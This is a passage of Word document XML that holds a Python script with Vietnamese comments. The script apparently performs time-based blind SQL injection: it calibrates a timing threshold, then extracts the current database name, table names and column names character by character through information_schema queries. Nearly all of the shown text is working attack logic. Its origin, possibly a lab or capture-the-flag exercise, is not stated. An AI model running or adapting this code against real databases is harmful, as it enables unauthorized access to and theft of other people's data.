    <w:p w14:paraId="02DCCA8F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B538B37" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    select_sql = "SELECT DATABASE()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F10B0D2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C522A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    length_expr = f"LENGTH(({select_sql}))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C8E20E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    length = extract_int(length_expr, low=0, high=max_len)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13953A42" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="5EE8C387" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print(f"    Length: {length}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A1EBCF" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="38E02EE7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    result = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B74316F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="039916D1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    for pos in range(1, length + 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230CF8D7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        ascii_expr = f"ASCII(SUBSTRING(({select_sql}), {pos}, 1))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B30A53" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        ascii_code = extract_int(ascii_expr, low=ASCII_LOW, high=ASCII_HIGH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469FF129" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="00F39807" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        result += chr(ascii_code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1BE7C3" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        print(f"\r    Extracting: {result}", end="", flush=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7596E58D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="38F14307" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA53BE3" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF72CDC" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="5880D301" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="612BBA75" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def sql_string(value: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D0653" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408869A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Đư</w:t>
      </w:r>
      <w:r>
        <w:t>a string Python v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t>o SQL string literal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620A3BA" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D35F1FC" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    escaped = value.replace("\\", "\\\\").replace("'", "\\'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69911B19" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return f"'{escaped}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC98404" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="13DA89E9" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="41E97E3F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359CFF1E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># ENUMERATION FUNCTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F3FFA2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A2CC9B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="11903F96" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def get_database_name() -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E418D5" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print("\n[*] Getting current database name...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A999E2F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return extract_string("SELECT DATABASE()", max_len=64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7256661C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="779835E2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="255806BB" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def get_table_count() -&gt; int:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06EF81" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print("\n[*] Getting table count...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EEAD9" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    expr = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13246F83" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "SELECT COUNT(table_name) "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D69E8C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "FROM information_schema.tables "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D5645" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "WHERE table_schema = DATABASE()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C33872E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD5E221" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return extract_int(expr, low=0, high=100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B50CD8E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="05EA7198" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="0E147FC1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def get_table_name(index: int) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4375D70B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print(f"\n[*] Getting table name #{index + 1}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC7A939" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    query = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B3BC95" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "SELECT table_name "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225687E8" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "FROM information_schema.tables "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA898C9" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "WHERE table_schema = DATABASE() "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA3821" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "ORDER BY table_name "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C480D0D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        f"LIMIT {index},1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43297501" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A7391" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return extract_string(query, max_len=64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB05119" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="13241A9B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="6B1D5CC9" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def get_column_count(table_name: str) -&gt; int:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607D78DD" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print(f"\n[*] Getting column count for table: {table_name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48929B37" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    expr = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B595A28" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "SELECT COUNT(column_name) "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE48DD1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "FROM information_schema.columns "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74216A3B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "WHERE table_schema = DATABASE() "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F55B6F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        f"AND table_name = {sql_string(table_name)}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC190DC" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF1219" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return extract_int(expr, low=0, high=100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6428B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="4FF392D4" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="4E54C208" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def get_column_name(table_name: str, index: int) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A47FC7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print(f"\n[*] Getting column #{index + 1} from table: {table_name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6CB16" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    query = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4669E402" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "SELECT column_name "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675CF279" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "FROM information_schema.columns "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CEEC50" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "WHERE table_schema = DATABASE() "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644CA987" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        f"AND table_name = {sql_string(table_name)} "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C10929B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "ORDER BY ordinal_position "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D53A18" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        f"LIMIT {index},1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5922993D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D8FEE" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return extract_string(query, max_len=64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63675DF9" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="0F8D025C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="2FA0424A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321BD392" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># MAIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709054D7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C139CE9" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="47778A8F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def main() -&gt; None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B69CA" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    global threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E63C0E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="7B9ABE79" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    threshold = calibrate()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A1C8B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print(f"[*] Timing threshold: {threshold:.2f}s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75F29D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="0AE93D17" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    database_name = get_database_name()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D95CD8" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print(f"\n[+] Database name: {database_name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB9ADF" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="27010CAB" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    table_count = get_table_count()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4FC3AD" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print(f"\n[+] Total tables: {table_count}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512AF99" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="38E73BDA" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    tables = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFE7AC" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="23978448" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    for i in range(table_count):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BA8CFC" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        table_name = get_table_name(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF5652" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        tables.append(table_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F5929" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        print(f"[+] Table #{i + 1}: {table_name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EC5DC7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="4AD653B7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print("\n==============================")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5664B5" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print("TABLES AND COLUMNS")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C622355" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print("==============================")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF25AD5" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="5B9366E2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    for table in tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DECD35" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        column_count = get_column_count(table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7353AE" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        print(f"\n[+] Table: {table}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E037D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        print(f"    Column count: {column_count}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8C4F9" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="09697A3F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        columns = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E838B0B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="0779FBC4" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        for i in range(column_count):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC4EB7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            column_name = get_column_name(table, i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24AB61" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            columns.append(column_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CF8D77" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="1672F75C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        print(f"    Columns: {', '.join(columns)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538831D4" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="2AEC6EB4" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
